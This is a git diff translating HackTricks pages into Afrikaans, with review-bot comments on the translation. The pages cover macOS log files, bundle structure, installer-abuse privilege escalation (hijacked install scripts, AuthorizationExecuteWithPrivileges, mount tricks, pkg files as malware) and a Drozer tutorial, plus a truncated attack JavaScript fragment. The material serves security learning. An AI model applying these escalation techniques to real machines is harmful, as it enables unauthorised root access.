**`$HOME/Library/Preferences/com.apple.recentitems.plist`**: Stores recently accessed files and applications through "Finder". 
-* **`$HOME/Library/Preferences/com.apple.loginitems.plsit`**: Stores items to launch upon system startup -* **`$HOME/Library/Logs/DiskUtility.log`**: Log file for thee DiskUtility App (info about drives, including USBs) -* **`/Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist`**: Data about wireless access points. -* **`/private/var/db/launchd.db/com.apple.launchd/overrides.plist`**: List of daemons deactivated. +* **`$HOME/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2`**: Bevat inligting oor afgelaai lêers, soos die URL waarvandaan hulle afgelaai is. +* **`/var/log/system.log`**: Hooflog van OSX-stelsels. com.apple.syslogd.plist is verantwoordelik vir die uitvoering van syslogging (jy kan nagaan of dit gedeaktiveer is deur te soek na "com.apple.syslogd" in `launchctl list`. +* **`/private/var/log/asl/*.asl`**: Dit is die Apple-stelsellogboeke wat interessante inligting kan bevat. +* **`$HOME/Library/Preferences/com.apple.recentitems.plist`**: Stoor onlangs benaderde lêers en toepassings deur "Finder". +* **`$HOME/Library/Preferences/com.apple.loginitems.plsit`**: Stoor items om by stelselopstart te begin +* **`$HOME/Library/Logs/DiskUtility.log`**: Loglêer vir die DiskUtility-toepassing (inligting oor aandrywings, insluitend USB's) +* **`/Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist`**: Data oor draadlose toegangspunte. +* **`/private/var/db/launchd.db/com.apple.launchd/overrides.plist`**: Lys van gedeaktiveerde daemons.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
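Review bot: the translated log-files list carries the `plsit` typo over in the `$HOME/Library/Preferences/com.apple.loginitems.plsit` entry, and the `/var/log/system.log` entry still never closes the parenthesis opened at "(jy kan nagaan of dit gedeaktiveer is ... in `launchctl list`."; since the paths are the reference value of that list, the added line should read `com.apple.loginitems.plist` and the sentence should end with `)`. Two smaller points in the same file: "binaêre" in the "Universele binaêre & Mach-o-formaat" heading and paragraph should be "binêre" (the spelling this patch uses in the bundles page), and the blank lines between the prose and the ```bash fences in the ACL and resource-fork hunks were deleted along with the English text, which makes the translated page denser than the untranslated ones without any content reason.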
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md index 74fc7e1e8..59705ecb4 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md @@ -1,74 +1,74 @@ -# macOS Bundles +# macOS Bundels
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-## Basic Information +## Basiese Inligting -Bundles in macOS serve as containers for a variety of resources including applications, libraries, and other necessary files, making them appear as single objects in Finder, such as the familiar `*.app` files. The most commonly encountered bundle is the `.app` bundle, though other types like `.framework`, `.systemextension`, and `.kext` are also prevalent. +Bundels in macOS dien as houers vir 'n verskeidenheid hulpbronne, insluitend toepassings, biblioteke en ander nodige lêers, wat dit laat voorkom as enkele voorwerpe in Finder, soos die bekende `*.app`-lêers. Die mees algemeen aangetroffe bundel is die `.app`-bundel, alhoewel ander tipes soos `.framework`, `.systemextension` en `.kext` ook algemeen voorkom. -### Essential Components of a Bundle +### Essensiële Komponente van 'n Bundel -Within a bundle, particularly within the `.app/Contents/` directory, a variety of important resources are housed: +Binne 'n bundel, veral binne die `.app/Contents/`-gids, word 'n verskeidenheid belangrike hulpbronne gehuisves: -- **_CodeSignature**: This directory stores code-signing details vital for verifying the integrity of the application. You can inspect the code-signing information using commands like: - %%%bash - openssl dgst -binary -sha1 /Applications/Safari.app/Contents/Resources/Assets.car | openssl base64 - %%% -- **MacOS**: Contains the executable binary of the application that runs upon user interaction. -- **Resources**: A repository for the application's user interface components including images, documents, and interface descriptions (nib/xib files). -- **Info.plist**: Acts as the application's main configuration file, crucial for the system to recognize and interact with the application appropriately. +- **_CodeSignature**: Hierdie gids stoor kode-ondertekendetails wat noodsaaklik is vir die verifikasie van die integriteit van die toepassing. 
Jy kan die kode-ondertekeningsinligting inspekteer deur opdragte soos die volgende te gebruik: +%%%bash +openssl dgst -binary -sha1 /Applications/Safari.app/Contents/Resources/Assets.car | openssl base64 +%%% +- **MacOS**: Bevat die uitvoerbare binêre lêer van die toepassing wat uitgevoer word wanneer die gebruiker interaksie het. +- **Resources**: 'n Bergplek vir die toepassing se gebruikerskoppelvlakkomponente, insluitend beelde, dokumente en koppelvlakbeskrywings (nib/xib-lêers). +- **Info.plist**: Tree op as die toepassing se hoofkonfigurasie-lêer, wat noodsaaklik is vir die stelsel om die toepassing behoorlik te herken en mee te interaksieer. -#### Important Keys in Info.plist +#### Belangrike Sleutels in Info.plist -The `Info.plist` file is a cornerstone for application configuration, containing keys such as: +Die `Info.plist`-lêer is 'n hoeksteen vir toepassingskonfigurasie en bevat sleutels soos: -- **CFBundleExecutable**: Specifies the name of the main executable file located in the `Contents/MacOS` directory. -- **CFBundleIdentifier**: Provides a global identifier for the application, used extensively by macOS for application management. -- **LSMinimumSystemVersion**: Indicates the minimum version of macOS required for the application to run. +- **CFBundleExecutable**: Spesifiseer die naam van die hoofuitvoerbare lêer wat in die `Contents/MacOS`-gids geleë is. +- **CFBundleIdentifier**: Verskaf 'n globale identifiseerder vir die toepassing, wat uitgebreid deur macOS gebruik word vir toepassingsbestuur. +- **LSMinimumSystemVersion**: Dui die minimum weergawe van macOS aan wat vereis word vir die uitvoering van die toepassing. 
-### Exploring Bundles +### Verkenning van Bundels -To explore the contents of a bundle, such as `Safari.app`, the following command can be used: +Om die inhoud van 'n bundel, soos `Safari.app`, te verken, kan die volgende opdrag gebruik word: %%%bash ls -lR /Applications/Safari.app/Contents %%% -This exploration reveals directories like `_CodeSignature`, `MacOS`, `Resources`, and files like `Info.plist`, each serving a unique purpose from securing the application to defining its user interface and operational parameters. +Hierdie verkenning onthul gidsname soos `_CodeSignature`, `MacOS`, `Resources`, en lêernaam soos `Info.plist`, wat elk 'n unieke doel dien, van die beveiliging van die toepassing tot die definisie van sy gebruikerskoppelvlak en operasionele parameters. -#### Additional Bundle Directories +#### Addisionele Bundelgidse -Beyond the common directories, bundles may also include: +Buiten die algemene gidse kan bundels ook die volgende insluit: -- **Frameworks**: Contains bundled frameworks used by the application. -- **PlugIns**: A directory for plug-ins and extensions that enhance the application's capabilities. -- **XPCServices**: Holds XPC services used by the application for out-of-process communication. +- **Frameworks**: Bevat gebundelde raamwerke wat deur die toepassing gebruik word. +- **PlugIns**: 'n Gids vir invoegtoepassings en uitbreidings wat die vermoëns van die toepassing verbeter. +- **XPCServices**: Hou XPC-diens wat deur die toepassing gebruik word vir buiteproseskommunikasie. -This structure ensures that all necessary components are encapsulated within the bundle, facilitating a modular and secure application environment. +Hierdie struktuur verseker dat alle nodige komponente binne die bundel gekapsuleer is, wat 'n modulêre en veilige toepassingsomgewing fasiliteer. 
-For more detailed information on `Info.plist` keys and their meanings, the Apple developer documentation provides extensive resources: [Apple Info.plist Key Reference](https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Introduction/Introduction.html). +Vir meer gedetailleerde inligting oor `Info.plist`-sleutels en hul betekenisse, bied die Apple-ontwikkelaarsdokumentasie uitgebreide hulpbronne: [Apple Info.plist Sleutelverwys](https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Introduction/Introduction.html).
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
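Review bot: in the `_CodeSignature` list item the `%%%bash` / `openssl dgst -binary -sha1 ...` / `%%%` block appears to have lost the indentation that kept it inside the bullet (the removed lines sit after leading whitespace, the added `+%%%bash` lines start at column 0), so the block would close the list and the following `- **MacOS**` item would open a new one; keep the block indented under the bullet as in the English version. Wording in the same hunk: "mee te interaksieer" is not Afrikaans (use "mee te kommunikeer" or "interaksie mee te hê"), "lêernaam soos `Info.plist`" should be "lêers soos `Info.plist`", "Hou XPC-diens" should be plural "XPC-dienste", and the link text "Apple Info.plist Sleutelverwys" should be "Sleutelverwysing".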
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md index 113c1d4bf..12fc49bf9 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md @@ -1,37 +1,36 @@ -# macOS Installers Abuse +# macOS Installerse Misbruik
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Pkg Basic Information +## Pkg Basiese Inligting -A macOS **installer package** (also known as a `.pkg` file) is a file format used by macOS to **distribute software**. These files are like a **box that contains everything a piece of software** needs to install and run correctly. +'n macOS **installasiepakkie** (ook bekend as 'n `.pkg`-lêer) is 'n lêerformaat wat deur macOS gebruik word om sagteware te **versprei**. Hierdie lêers is soos 'n **boks wat alles bevat wat 'n stuk sagteware** nodig het om korrek te installeer en te loop. -The package file itself is an archive that holds a **hierarchy of files and directories that will be installed on the target** computer. It can also include **scripts** to perform tasks before and after the installation, like setting up configuration files or cleaning up old versions of the software. +Die pakkie-lêer self is 'n argief wat 'n **hiërargie van lêers en gide bevat wat op die teikenrekenaar geïnstalleer sal word**. Dit kan ook **skripte** insluit om take voor en na die installasie uit te voer, soos die opstel van konfigurasie-lêers of die skoonmaak van ou weergawes van die sagteware. -### Hierarchy +### Hiërargie
https://www.youtube.com/watch?v=iASSG0_zobQ
-* **Distribution (xml)**: Customizations (title, welcome text…) and script/installation checks -* **PackageInfo (xml)**: Info, install requirements, install location, paths to scripts to run -* **Bill of materials (bom)**: List of files to install, update or remove with file permissions -* **Payload (CPIO archive gzip compresses)**: Files to install in the `install-location` from PackageInfo -* **Scripts (CPIO archive gzip compressed)**: Pre and post install scripts and more resources extracted to a temp directory for execution. - -### Decompress +* **Distribution (xml)**: Aanpassings (titel, welkomstekst...) en skrips/installasiekontroles +* **PackageInfo (xml)**: Inligting, installasievereistes, installasieplek, paaie na skripte om uit te voer +* **Bill of materials (bom)**: Lys van lêers om te installeer, op te dateer of te verwyder met lêerregte +* **Payload (CPIO-argief gzip-gekomprimeer)**: Lêers om te installeer in die `install-location` van PackageInfo +* **Skripte (CPIO-argief gzip-gekomprimeer)**: Voor- en na-installasieskripte en meer hulpbronne wat onttrek word na 'n tydelike gids vir uitvoering. +### Ontkomprimeer ```bash # Tool to directly get the files inside a package pkgutil —expand "/path/to/package.pkg" "/path/to/out/dir" 
@@ -45,74 +44,71 @@ xar -xf "/path/to/package.pkg" cat Scripts | gzip -dc | cpio -i cpio -i < Scripts ``` +## DMG Basiese Inligting -## DMG Basic Information +DMG-lêers, of Apple Disk Images, is 'n lêerformaat wat deur Apple se macOS gebruik word vir skyfafbeeldings. 'n DMG-lêer is in wese 'n **monteerbare skyfafbeelding** (dit bevat sy eie lêersisteem) wat gewoonlik saamgedruk en soms versleutelde rou blokdata bevat. Wanneer jy 'n DMG-lêer oopmaak, monteer macOS dit asof dit 'n fisiese skyf is, sodat jy toegang tot sy inhoud kan verkry. -DMG files, or Apple Disk Images, are a file format used by Apple's macOS for disk images. A DMG file is essentially a **mountable disk image** (it contains its own filesystem) that contains raw block data typically compressed and sometimes encrypted. When you open a DMG file, macOS **mounts it as if it were a physical disk**, allowing you to access its contents. - -### Hierarchy +### Hiërargie
-The hierarchy of a DMG file can be different based on the content. However, for application DMGs, it usually follows this structure: +Die hiërargie van 'n DMG-lêer kan verskil afhangende van die inhoud. Vir toepassings-DMGs volg dit gewoonlik hierdie struktuur: -* Top Level: This is the root of the disk image. It often contains the application and possibly a link to the Applications folder. - * Application (.app): This is the actual application. In macOS, an application is typically a package that contains many individual files and folders that make up the application. - * Applications Link: This is a shortcut to the Applications folder in macOS. The purpose of this is to make it easy for you to install the application. You can drag the .app file to this shortcut to install the app. +* Topvlak: Dit is die wortel van die skyfafbeelding. Dit bevat dikwels die toepassing en moontlik 'n skakel na die Toepassings-vouer. +* Toepassing (.app): Dit is die werklike toepassing. In macOS is 'n toepassing tipies 'n pakkie wat baie individuele lêers en vouers bevat wat die toepassing uitmaak. +* Toepassingskakel: Dit is 'n skakel na die Toepassings-vouer in macOS. Die doel hiervan is om dit maklik te maak om die toepassing te installeer. Jy kan die .app-lêer na hierdie skakel sleep om die app te installeer. -## Privesc via pkg abuse +## Privesc via pkg-misbruik -### Execution from public directories +### Uitvoering vanaf openbare gids -If a pre or post installation script is for example executing from **`/var/tmp/Installerutil`**, and attacker could control that script so he escalate privileges whenever it's executed. Or another similar example: +As 'n voor- of na-installasieskrip byvoorbeeld uitgevoer word vanaf **`/var/tmp/Installerutil`**, kan 'n aanvaller daardie skrip beheer en voorregte verhoog wanneer dit uitgevoer word. Of 'n ander soortgelyke voorbeeld:
https://www.youtube.com/watch?v=iASSG0_zobQ
### AuthorizationExecuteWithPrivileges -This is a [public function](https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg) that several installers and updaters will call to **execute something as root**. This function accepts the **path** of the **file** to **execute** as parameter, however, if an attacker could **modify** this file, he will be able to **abuse** its execution with root to **escalate privileges**. - +Dit is 'n [openbare funksie](https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg) wat verskeie installeerders en opdateringsoproep om iets as root uit te voer. Hierdie funksie aanvaar die **pad** van die **lêer** wat as parameter **uitgevoer** moet word, maar as 'n aanvaller hierdie lêer kon **verander**, sal hy in staat wees om die uitvoering daarvan met root te **misbruik** om voorregte te verhoog. ```bash # Breakpoint in the function to check wich file is loaded (lldb) b AuthorizationExecuteWithPrivileges # You could also check FS events to find this missconfig ``` +Vir meer inligting, kyk na hierdie praatjie: [https://www.youtube.com/watch?v=lTOItyjTTkw](https://www.youtube.com/watch?v=lTOItyjTTkw) -For more info check this talk: [https://www.youtube.com/watch?v=lTOItyjTTkw](https://www.youtube.com/watch?v=lTOItyjTTkw) +### Uitvoering deur montering -### Execution by mounting +As 'n installeerder skryf na `/tmp/fixedname/bla/bla`, is dit moontlik om **'n montering te skep** oor `/tmp/fixedname` sonder eienaars sodat jy enige lêer tydens die installasie kan wysig om die installasieproses te misbruik. -If an installer writes to `/tmp/fixedname/bla/bla`, it's possible to **create a mount** over `/tmp/fixedname` with noowners so you could **modify any file during the installation** to abuse the installation process. +'n Voorbeeld hiervan is **CVE-2021-26089** wat daarin geslaag het om 'n periodieke skripsie te **oorwrite** om uitvoering as root te verkry. 
Vir meer inligting, kyk na die praatjie: [**OBTS v4.0: "Mount(ain) of Bugs" - Csaba Fitzl**](https://www.youtube.com/watch?v=jSYPazD4VcE) -An example of this is **CVE-2021-26089** which managed to **overwrite a periodic script** to get execution as root. For more information take a look to the talk: [**OBTS v4.0: "Mount(ain) of Bugs" - Csaba Fitzl**](https://www.youtube.com/watch?v=jSYPazD4VcE) +## pkg as kwaadwillige sagteware -## pkg as malware +### Leë Nutslading -### Empty Payload - -It's possible to just generate a **`.pkg`** file with **pre and post-install scripts** without any payload. +Dit is moontlik om net 'n **`.pkg`** lêer te genereer met **voor- en na-installasie skripsies** sonder enige nutslading. ### JS in Distribution xml -It's possible to add **` +xhr.open("GET", "content://media/external/file/747"); +xhr.send(); +} + ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
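Review bot: `noowners` in the "Uitvoering deur montering" paragraph is the literal mount option, so rendering it as "sonder eienaars" loses the technical meaning; keep it as `noowners` in code formatting as the English line does. The same applies to the hierarchy list: "Scripts" was renamed "Skripte" while the context line `cat Scripts | gzip -dc | cpio -i` shows it is the archive's actual name, and "Payload" is kept as `**Payload (CPIO-argief ...)**` in the list but becomes "Nutslading" in the "Leë Nutslading" heading; pick one term and keep file names untranslated. The AuthorizationExecuteWithPrivileges paragraph is garbled ("wat verskeie installeerders en opdateringsoproep om iets as root uit te voer") and drops the bold on the "execute something as root" phrase; something like "wat verskeie installeerders en opdateerders roep om **iets as root uit te voer**" keeps the sentence and the emphasis. Pre-existing but visible in the context lines: `pkgutil —expand` uses an em dash instead of `--expand` and will not run as written, worth a follow-up fix. Finally, the "JS in Distribution xml" hunk is cut off in the diff as shown (it jumps into an unrelated `xhr.open("GET", "content://media/external/file/747")` snippet), so that section's translation cannot be reviewed from this patch.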
- - diff --git a/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md b/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md index 223be8c86..d44c783fd 100644 --- a/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md +++ b/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md @@ -1,95 +1,84 @@ -# Drozer Tutorial +# Drozer Tutoriaal
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings te verdien tot **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} -## APKs to test +## APK's om te toets -* [Sieve](https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk) (from mrwlabs) +* [Sieve](https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk) (van mrwlabs) * [DIVA](https://payatu.com/wp-content/uploads/2016/01/diva-beta.tar.gz) -**Parts of this tutorial were extracted from the [Drozer documentation pdf](https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf).** +**Dele van hierdie tutoriaal is onttrek uit die [Drozer-dokumentasie pdf](https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf).** -## Installation - -Install Drozer Client inside your host. Download it from the [latest releases](https://github.com/mwrlabs/drozer/releases). +## Installasie +Installeer Drozer Client binne jou gasheer. Laai dit af van die [nuutste vrystellings](https://github.com/mwrlabs/drozer/releases). ```bash pip install drozer-2.4.4-py2-none-any.whl pip install twisted pip install service_identity ``` - -Download and install drozer APK from the [latest releases](https://github.com/mwrlabs/drozer/releases). At this moment it is [this](https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk). - +Laai die drozer APK af en installeer dit vanaf die [nuutste vrystellings](https://github.com/mwrlabs/drozer/releases). 
